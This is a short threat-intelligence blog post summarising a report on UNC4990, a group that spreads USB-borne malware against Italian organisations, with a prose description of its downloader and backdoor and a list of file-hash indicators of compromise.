Evolution of UNC4990: Uncovering USB Malware's Hidden Depths [Wednesday, January 31, 2024]

This report provides an analysis of the threat actor group UNC4990, which has been conducting campaigns since at least 2020 primarily targeting org...
Evolution of UNC4990: Uncovering USB Malware's Hidden Depths [Wednesday, January 31, 2024]
Evolution of UNC4990: Uncovering USB Malware's Hidden Depths

Evolution of UNC4990: Uncovering USB Malware's Hidden Depths

Description :
This report provides an analysis of the threat actor group UNC4990, which has been conducting campaigns since at least 2020 primarily targeting organizations in Italy across industries like health, transportation, and logistics. The group relies heavily on USB-based malware for initial infection, using malicious shortcut files that execute PowerShell scripts to download additional payloads. The report tracks the evolution of the group's tactics, techniques, and procedures over time, including their shift from using text files to abusing legitimate services like GitHub and Vimeo to host encoded payloads. Their toolset includes the EMPTYSPACE downloader and the QUIETBOARD backdoor, which have modular components to expand functionality. The report provides technical details on the capabilities of these tools as well as opportunities for detection based on forensic artifacts.

Published Created Modified
2024-01-31 09:14:09 2024-01-31 09:14:09 2024-01-31 09:36:48

Tags

Indicators

URLs : Domains : Malwares :
  • QUIETBOARD
  • EMPTYSPACE
Hashes :
  • fae6192a0648a892c845d9498002ca79497ea58e5315d277f65f7b243f7110e4
  • 99d9dfd8f1c11d055e515a02c1476bd9036c788493063f08b82bb5f34e19dfd6
  • bc1qk55vk7wjgzg3pmxlh59rv5dlgewd9jem5nrt4w
  • 6fb4945bb73ac3f447fb7af6bd2937395a067a6e0c0900886095436114a17443
  • 8a492973b12f84f49c52216d8c29755597f0b92a02311286b1f75ef5c265c30d
  • 4814393285c2afcd671dbdd53b3b2021963c32a09745f83ed894e5ae4e2764b8
  • 72f1ba6309c98cd52ffc99dd15c45698dfca2d6ce1ef0bf262433b5dfff084be
  • a4f20b60a50345ddf3ac71b6e8c5ebcb9d069721b0b0edc822ed2e7569a0bb40
  • b38dbaea648ef7da1c639f4fdaac0d88f03306ea42f0edc9af512c613dbdb7e1
  • 461d580a16cf1fa67b4ac751dfe9d36b2de3f13c97670b3b12641f20246ce4b3
Intrusion set :
  • UNC4990
Location :
  • Italy
MITRE ATT&CK Techniques : Other observables :
  • Health
  • Logistics
  • Transportation

External References

You can download the txt file containing the indicators by clicking on the button below:

About the author
Julien B.

Securitricks

Up-to-Date Cybersecurity Insights & Malware Reports

Securitricks

Great! You’ve successfully signed up.

Welcome back! You've successfully signed in.

You've successfully subscribed to Securitricks.

Success! Check your email for magic link to sign-in.

Success! Your billing info has been updated.

Your billing was not updated.